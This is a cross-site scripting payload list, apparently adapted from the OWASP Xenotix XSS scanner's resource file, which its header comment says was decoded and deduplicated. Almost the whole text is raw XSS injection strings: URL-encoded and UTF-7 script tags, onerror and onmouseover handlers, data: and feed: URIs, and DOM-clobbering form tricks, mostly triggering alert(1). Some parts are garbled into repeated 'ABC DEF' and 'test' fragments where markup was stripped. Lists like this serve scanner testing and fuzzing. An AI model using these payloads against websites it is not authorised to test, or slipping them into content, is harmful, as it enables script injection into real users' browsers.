# # Original source is from # https://github.com/ajinabraham/OWASP-Xenotix-XSS-Exploit-Framework/blob/master/Scanner/xenotix_main.resx # # * XML-decoded # * Duplicates removed # * arious forms of control-characters normalized # * Non-XSS removed # * Obsolete XSS removed (e.g. one for src=livescript lol circa 1995) # %00 � # not doing XSS inside a comment # --> "'`><%00img src=xxx:x onerror=javascript:alert(1)> %00“> '`"><%00script>javascript:alert(1) 0? :postMessage(importScripts('data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk')) OnMouseOver {Firefox & Opera} 1 1 1> 1> 1`> 1`> 1 '%20onmouseover=alert(1)' --> %22%20onmouseover=javascript:alert(1)%20%22 %22%3E%3C%73%63%72%69%70%74%3E%4B%43%46%3C%2F%73%63%72%69%70%74%3E %22/%3E%3Cmeta%20http-equiv=refresh%20content=0;javascript:alert(1);> %22%3E%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E %26'%22%3E%3Cscript%3Ealert(%2Fkcf%2F)%3C%2Fscript%3E%3D %27%3E%3C%73%63%72%69%70%74%3E%4B%43%46%3C%2F%73%63%72%69%70%74%3E ">

%00 ">' %3Cform%20name%3D%22body%22%20onmouseover%3D%22alert(1)%22%20style%3D%22height%3A800px%22%3E%3Cfieldset%20name%3D%22attributes%22%3E%3Cform%3E%3C%2Fform%3E%3Cform%20name%3D%22parentNode%22%3E%3Cimg%20id%3D%22attributes%22%3E%3C%2Fform%3E%3C%2Ffieldset%3E%3C%2Fform%3E %3Cform%20onmouseover%3Dalert(1)%3E%3Cinput%20name%3Dattributes%3E %3Cimg%20name%3DgetElementsByTagName%20src%3D1%20%20onerror%3Dalert(1)%3E %3cimg onerror=alert(1) src=a%3e "'`><%3Cimg src=xxx:x onerror=javascript:alert(1)> %3Cscript%3Ea%3D%2FKCF%2F %3Cscript%3Ealert(1)%3B%3C%2Fscript%3E '`"><%3Cscript>javascript:alert(1) %3Cscript>javascript:alert(1) “%3e%3cscript%3ealert(1)%3c/script%3e --> %7D%3C/style%3E43%27%22%3E%3C/title%3E%3Cscript%3Ea=eval;b=alert;a(b(/KCF/.source));%3C/script%3E%27%22%3E%3Cmarquee%3E%3Ch1%3EKCF%3C/h1%3E%3C/marquee%3E XYZClickMe KCF "'`>ABC
DEF "'`>ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF `><img src=x:x onerror=alert(2)// `><img src=x:x onerror=alert(3)// test test test test test test test test test test test test test test test test test test kcf test test test test test test test test test test test test test test test kcfkcf testtest test XXKCF `><img src=x:x onerror=alert(1)></a> `><img src=x:x onerror=javascript:alert(1)></a> kcfkcf testtest test1 test1 KCF test test test test test test test test test test test test test test kcf test test test test test test kcf [data "1
"] data:text/html,%3Cscript%3Ealert(1)%3C%2Fscript%3E data:text/html,%3Cscript%3Ealert(1)%3C/script%3E data:text/html,
kcf
X
X
KCF
x
style="x:">
DIV
XXX
XXX
X
X
X
.
KCF
XXX
X
X
KCF
XXX
kcf/div>
X
X
x​
x
x
x
x
X
{IE7}
]>&x; %E0 exp/* exp/* exp/* feed:data:text/html,%3cscript%3ealert%281%29%3c/script%3e feed:data:text/html,%3csvg%20onload=alert%281%29%3e /XXX KCF +ADw-SCRIPT+AD4-alert(1);+ADw-/SCRIPT+AD4- +ADw-SCRIPT+AD4-alert('KCF');+ADw-/SCRIPT+AD4- +ADw-SCRIPT+AD4-%25(payload)s;+ADw-/SCRIPT+AD4- htmlStr = 'kcf'; document.getElementById('body').innerHTML = htmlStr; try { alert(1);}catch(e){alert(1);}; htmlStr = 'kcf'; document.getElementById('body').innerHTML = htmlStr; try { if(document.getElementById('body').firstChild.protocol === 'javascript:') { alert(1); } }catch(e){alert(1);}; KCF""","XML namespace."),(""" http://%22%20onerror=%22alert%281%29;// http://www.keralacyberforcealert(1) "> /*iframe/src*/